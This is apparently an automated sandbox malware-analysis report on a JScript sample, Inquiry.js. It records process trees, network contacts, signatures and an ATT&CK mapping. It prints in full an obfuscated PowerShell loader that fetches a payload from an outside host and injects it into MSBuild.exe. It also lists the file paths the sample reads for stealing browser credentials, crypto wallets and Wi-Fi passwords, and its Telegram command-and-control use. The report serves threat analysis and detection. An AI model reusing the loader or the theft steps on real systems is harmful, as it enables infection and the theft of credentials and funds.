          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 4E2000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 4E4000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 107A008Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += $CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$originaltext = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredtext = $originaltext -replace '#', 't';$imgaekuowcnmosiorbwc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zkmkbbafbugnswxhaiiz = new-object system.net.webclient;$tzuolpcfanfwnppuuqnl = $zkmkbbafbugnswxhaiiz.downloaddata($imgaekuowcnmosiorbwc);$uoozazuaclvsicaclkuh = [system.text.encoding]::utf8.getstring($tzuolpcfanfwnppuuqnl);$ckcwwogxjxbezaugptsp = '<<base64_start>>';$zrccagwcorxzhkkulgiz = '<<base64_end>>';$cbqkcpceqgapcozgiaai = $uoozazuaclvsicaclkuh.indexof($ckcwwogxjxbezaugptsp);$tmpodlzzhhjcgjfwbirf = $uoozazuaclvsicaclkuh.indexof($zrccagwcorxzhkkulgiz);$cbqkcpceqgapcozgiaai -ge 0 -and $tmpodlzzhhjcgjfwbirf -gt $cbqkcpceqgapcozgiaai;$cbqkcpceqgapcozgiaai += $ckcwwogxjxbezaugptsp.length;$awiluzilfnznglerzrin = $tmpodlzzhhjcgjfwbirf - $cbqkcpceqgapcozgiaai;$siibuoizcbqulngkwfwc = $uoozazuaclvsicaclkuh.substring($cbqkcpceqgapcozgiaai, $awiluzilfnznglerzrin);$usqtkglifabakelrumfk = -join ($siibuoizcbqulngkwfwc.tochararray() | foreach-object { $_ })[-1..-($siibuoizcbqulngkwfwc.length)];$iqfezgjtzajhdcbqdzmr = [system.convert]::frombase64string($usqtkglifabakelrumfk);$nzghgktbzpilbmwnliec = [system.reflection.assembly]::load($iqfezgjtzajhdcbqdzmr);$qbpkwbeczbjsbndzhnnz = [dnlib.io.home].getmethod('vai');$qbpkwbeczbjsbndzhnnz.invoke($null, @($restoredtext, 'wfwxdqklzhtiojulgsfz', 'wfwxdqklzhtiojulgsfz', 'wfwxdqklzhtiojulgsfz', 'msbuild', 'wfwxdqklzhtiojulgsfz', 'wfwxdqklzhtiojulgsfz','wfwxdqklzhtiojulgsfz','wfwxdqklzhtiojulgsfz','wfwxdqklzhtiojulgsfz','wfwxdqklzhtiojulgsfz','wfwxdqklzhtiojulgsfz','1','wfwxdqklzhtiojulgsfz','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$originaltext = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredtext = $originaltext -replace '#', 't';$imgaekuowcnmosiorbwc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zkmkbbafbugnswxhaiiz = new-object system.net.webclient;$tzuolpcfanfwnppuuqnl = $zkmkbbafbugnswxhaiiz.downloaddata($imgaekuowcnmosiorbwc);$uoozazuaclvsicaclkuh = [system.text.encoding]::utf8.getstring($tzuolpcfanfwnppuuqnl);$ckcwwogxjxbezaugptsp = '<<base64_start>>';$zrccagwcorxzhkkulgiz = '<<base64_end>>';$cbqkcpceqgapcozgiaai = $uoozazuaclvsicaclkuh.indexof($ckcwwogxjxbezaugptsp);$tmpodlzzhhjcgjfwbirf = $uoozazuaclvsicaclkuh.indexof($zrccagwcorxzhkkulgiz);$cbqkcpceqgapcozgiaai -ge 0 -and $tmpodlzzhhjcgjfwbirf -gt $cbqkcpceqgapcozgiaai;$cbqkcpceqgapcozgiaai += $ckcwwogxjxbezaugptsp.length;$awiluzilfnznglerzrin = $tmpodlzzhhjcgjfwbirf - $cbqkcpceqgapcozgiaai;$siibuoizcbqulngkwfwc = $uoozazuaclvsicaclkuh.substring($cbqkcpceqgapcozgiaai, $awiluzilfnznglerzrin);$usqtkglifabakelrumfk = -join ($siibuoizcbqulngkwfwc.tochararray() | foreach-object { $_ })[-1..-($siibuoizcbqulngkwfwc.length)];$iqfezgjtzajhdcbqdzmr = [system.convert]::frombase64string($usqtkglifabakelrumfk);$nzghgktbzpilbmwnliec = [system.reflection.assembly]::load($iqfezgjtzajhdcbqdzmr);$qbpkwbeczbjsbndzhnnz = [dnlib.io.home].getmethod('vai');$qbpkwbeczbjsbndzhnnz.invoke($null, @($restoredtext, 'wfwxdqklzhtiojulgsfz', 'wfwxdqklzhtiojulgsfz', 'wfwxdqklzhtiojulgsfz', 'msbuild', 'wfwxdqklzhtiojulgsfz', 'wfwxdqklzhtiojulgsfz','wfwxdqklzhtiojulgsfz','wfwxdqklzhtiojulgsfz','wfwxdqklzhtiojulgsfz','wfwxdqklzhtiojulgsfz','wfwxdqklzhtiojulgsfz','1','wfwxdqklzhtiojulgsfz','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: MSBuild.exe, 00000007.00000002.2153050216.00000000065A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000007.00000002.2118047859.00000000037FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2118047859.0000000003824000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2118047859.0000000003828000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3412, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3412, type: MEMORYSTR
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^qSC:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbt-^q
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q3C:\Users\user\AppData\Roaming\Exodus\exodus.wallett-^q
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q0C:\Users\user\AppData\Roaming\Ethereum\keystoret-^q
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q4C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-^q
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q0C:\Users\user\AppData\Roaming\Ethereum\keystoret-^q
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key3.dbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Yara matchFile source: 00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3412, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000007.00000002.2118047859.00000000037FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2118047859.0000000003824000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2118047859.0000000003828000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3412, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3412, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information22
          Scripting
          Valid Accounts131
          Windows Management Instrumentation
          22
          Scripting
          1
          DLL Side-Loading
          11
          Disable or Modify Tools
          1
          OS Credential Dumping
          1
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          2
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution
          1
          DLL Side-Loading
          311
          Process Injection
          2
          Obfuscated Files or Information
          LSASS Memory44
          System Information Discovery
          Remote Desktop Protocol2
          Data from Local System
          1
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter
          Logon Script (Windows)Logon Script (Windows)1
          DLL Side-Loading
          Security Account Manager451
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          11
          Encrypted Channel
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          PowerShell
          Login HookLogin Hook1
          Masquerading
          NTDS1
          Process Discovery
          Distributed Component Object Model1
          Clipboard Data
          3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script161
          Virtualization/Sandbox Evasion
          LSA Secrets161
          Virtualization/Sandbox Evasion
          SSHKeylogging14
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
          Process Injection
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          System Network Configuration Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1591681 Sample: Inquiry.js Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 43 paste.ee 2->43 45 api.telegram.org 2->45 47 8 other IPs or domains 2->47 61 Suricata IDS alerts for network traffic 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 71 13 other signatures 2->71 10 wscript.exe 1 14 2->10         started        14 msiexec.exe 2->14         started        signatures3 67 Connects to a pastebin service (likely for C&C) 43->67 69 Uses the Telegram API (likely for C&C communication) 45->69 process4 dnsIp5 55 paste.ee 23.186.113.60, 443, 49730 KLAYER-GLOBALNL Reserved 10->55 87 System process connects to network (likely due to code injection or exploit) 10->87 89 JScript performs obfuscated calls to suspicious functions 10->89 91 Suspicious powershell command line found 10->91 93 3 other signatures 10->93 16 powershell.exe 14 16 10->16         started        signatures6 process7 dnsIp8 39 melbournedistillers.com.au 162.241.87.113, 443, 49738 UNIFIEDLAYER-AS-1US United States 16->39 41 ia600805.us.archive.org 207.241.227.155, 443, 49731 INTERNET-ARCHIVEUS United States 16->41 57 Writes to foreign memory regions 16->57 59 Injects a PE file into a foreign processes 16->59 20 MSBuild.exe 15 36 16->20         started        24 MSBuild.exe 16->24         started        26 conhost.exe 16->26         started        signatures9 process10 dnsIp11 49 ip-api.com 208.95.112.1, 49740, 80 TUT-ASUS United States 20->49 51 api.telegram.org 149.154.167.220, 443, 49741 TELEGRAMRU United Kingdom 20->51 53 icanhazip.com 104.16.184.241, 49739, 80 CLOUDFLARENETUS United States 20->53 73 Tries to steal Mail credentials (via file / registry access) 20->73 75 Found many strings related to Crypto-Wallets (likely being stolen) 20->75 77 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 20->77 79 Tries to harvest and steal browser information (history, passwords, etc) 20->79 28 cmd.exe 1 20->28         started        81 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 24->81 83 Tries to harvest and steal WLAN passwords 24->83 85 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 24->85 signatures12 process13 signatures14 95 Uses netsh to modify the Windows network and firewall settings 28->95 97 Tries to harvest and steal WLAN passwords 28->97 31 netsh.exe 2 28->31         started        33 conhost.exe 28->33         started        35 findstr.exe 1 28->35         started        37 chcp.com 1 28->37         started        process15

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Inquiry.js8%VirustotalBrowse
          Inquiry.js5%ReversingLabsWin32.Trojan.Generic
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://analytics.paste.ee;0%Avira URL Cloudsafe
          https://analytics.paste.ee0%Avira URL Cloudsafe
          https://melbournedistillers.com.au/file/114.txt100%Avira URL Cloudmalware
          https://ia600805.us.archive.org0%Avira URL Cloudsafe
          https://www.google.com;0%Avira URL Cloudsafe
          https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg0%Avira URL Cloudsafe
          https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
          http://www.w3.orl0%Avira URL Cloudsafe
          https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpgX0%Avira URL Cloudsafe
          https://whatismyipaddressnow.co/API/FETCH/getcountry.php0%Avira URL Cloudsafe
          https://support.micro0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          ia600805.us.archive.org
          207.241.227.155
          truetrue
            unknown
            bg.microsoft.map.fastly.net
            199.232.214.172
            truefalse
              high
              melbournedistillers.com.au
              162.241.87.113
              truetrue
                unknown
                paste.ee
                23.186.113.60
                truefalse
                  high
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    high
                    ip-api.com
                    208.95.112.1
                    truefalse
                      high
                      api.telegram.org
                      149.154.167.220
                      truefalse
                        high
                        icanhazip.com
                        104.16.184.241
                        truefalse
                          high
                          121.205.6.0.in-addr.arpa
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://melbournedistillers.com.au/file/114.txttrue
                            • Avira URL Cloud: malware
                            unknown
                            https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpgtrue
                            • Avira URL Cloud: safe
                            unknown
                            http://icanhazip.com/false
                              high
                              https://paste.ee/d/rVRbIsiefalse
                                high
